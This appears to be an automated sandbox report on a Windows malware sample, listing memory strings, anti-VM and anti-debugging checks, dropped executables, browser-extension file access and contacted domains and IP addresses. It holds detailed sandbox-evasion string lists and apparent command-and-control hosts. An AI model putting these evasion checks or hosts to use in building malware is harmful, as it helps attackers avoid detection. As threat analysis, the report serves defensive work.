ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE.EXEVMWAREUSER.EXEVMWARETRAY.EXEVMTOOLSD.EXEVMWAREVMWAREVDSERVICE.EXEVDAGENT.EXEQEMU-GA.E
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, 1128.exe, 00000009.00000002.356909218.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
    Source: rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 6EXITPROCESSKERNEL32.DLL/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTION\GLOBAL??ASWHOOK.DLL/BIN/RUNTIME.EXEGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZRTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/AMD64/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/BIN/AMD64/COREDLL.BIN/BIN/AMD64/STUBMOD.BIN
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\849F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Windows\explorer.exe TID: 5340Thread sleep time: -51300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3620Thread sleep time: -480000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1272Thread sleep time: -48900s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 4944Thread sleep time: -44400s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 5896Thread sleep time: -38200s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\42FE.exe TID: 2508Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe TID: 6604Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe TID: 500Thread sleep time: -300000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe TID: 6636Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe TID: 4868Thread sleep time: -300000s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\1128.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_9-11262
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeThread delayed: delay time: 300000
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeThread delayed: delay time: 300000
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 513Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 357Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 489Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 570Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 444Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 468Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 382Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 842Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 839Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeJump to dropped file
    Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\170F.tmp.exeJump to dropped file
    Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C597.exeJump to dropped file
    Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FD42.exeJump to dropped file
    Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1AED.exeJump to dropped file
    Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B336.exeJump to dropped file
    Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ADEC.exeJump to dropped file
    Source: C:\Windows\System32\rundll32.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeThread delayed: delay time: 300000
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeThread delayed: delay time: 300000
    Source: C:\Users\user\AppData\Local\Temp\1128.exeAPI call chain: ExitProcess graph end nodegraph_9-11264
    Source: C:\Users\user\AppData\Local\Temp\1128.exeAPI call chain: ExitProcess graph end nodegraph_9-12219
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
    Source: A4A.exe, 00000012.00000002.622147226.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu8T
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
    Source: explorer.exe, 00000001.00000000.261980881.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000001.00000000.269072002.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
    Source: explorer.exe, 00000001.00000000.264348129.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
    Source: A4A.exe, 00000012.00000002.622147226.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
    Source: A4A.exe, 00000012.00000002.622147226.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
    Source: 1128.exe, 00000009.00000002.357269996.0000000001200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorvirtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService.exevmwareuser.exevmwaretray.exevmtoolsd.exeVMwareVMWAREvdservice.exevdagent.exeqemu-ga.e
    Source: rundll32.exe, 0000000C.00000002.573886364.00000156EF76C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
    Source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
    Source: 1128.exe, 00000009.00000002.357205143.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.573886364.00000156EF76C000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000887000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
    Source: explorer.exe, 00000001.00000000.269072002.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWARE
    Source: 1128.exe, 00000009.00000002.357269996.0000000001200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
    Source: 1128.exe, 00000009.00000003.346724018.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, 1128.exe, 00000009.00000002.357205143.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMU^
    Source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
    Source: 1128.exe, 00000009.00000002.357269996.0000000001200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink
    Source: explorer.exe, 00000001.00000000.269072002.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
    Source: explorer.exe, 00000001.00000000.269072002.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00403470 GetSystemInfo,VirtualQuery,VirtualQuery,KiUserExceptionDispatcher,9_2_00403470
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF782C FindFirstFileW,FindNextFileW,FindClose,12_2_00007DF449AF782C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF828C FindFirstFileW,FindNextFileW,12_2_00007DF449AF828C
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\849F.exeSystem information queried: CodeIntegrityInformation
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040A901 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_0040A901
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058092B mov eax, dword ptr fs:[00000030h]0_2_0058092B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00580D90 mov eax, dword ptr fs:[00000030h]0_2_00580D90
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074BB3A push dword ptr fs:[00000030h]0_2_0074BB3A
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1560 mov eax, dword ptr fs:[00000030h]9_2_008E1560
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1560 mov eax, dword ptr fs:[00000030h]9_2_008E1560
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1560 mov eax, dword ptr fs:[00000030h]9_2_008E1560
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00F2C851 mov eax, dword ptr fs:[00000030h]9_2_00F2C851
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\849F.exeProcess queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00405331 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00405331
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD17916D14 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_00007FFD17916D14
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_004038B0 IsBadStringPtrA,lstrlenA,IsBadCodePtr,IsBadReadPtr,GetProcessHeap,RtlAllocateHeap,IsBadCodePtr,VirtualProtect,GetModuleHandleA,HeapAlloc,InterlockedIncrement,HeapFree,GetProcessHeap,HeapAlloc,9_2_004038B0
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeMemory allocated: page read and write | page guard
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040E2D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,9_2_0040E2D1
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00405331 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00405331
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00405B81 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00405B81
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1F24 SetUnhandledExceptionFilter,9_2_008E1F24
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E2430 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_008E2430
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1DC2 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_008E1DC2
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E2223 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_008E2223
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD17919150 SetUnhandledExceptionFilter,12_2_00007FFD17919150

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeNetwork Connect: 189.143.218.79 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.99 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: bitbucket.org
    Source: C:\Windows\explorer.exeDomain query: perficut.at
    Source: C:\Windows\explorer.exeDomain query: potunulit.org
    Source: C:\Windows\explorer.exeDomain query: smartbot.dev
    Source: C:\Windows\explorer.exeNetwork Connect: 144.76.136.153 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 190.114.9.88 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 109.206.243.143 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 104.192.141.1 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.126 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 79.102.150.149 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: www.shorturl.at
    Source: C:\Windows\explorer.exeNetwork Connect: 45.154.253.152 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 67.199.248.10 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: ads-optimization-of-meta.web.app
    Source: C:\Windows\explorer.exeNetwork Connect: 45.15.156.204 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 95.158.162.200 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: github.com
    Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.3 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.4 443Jump to behavior
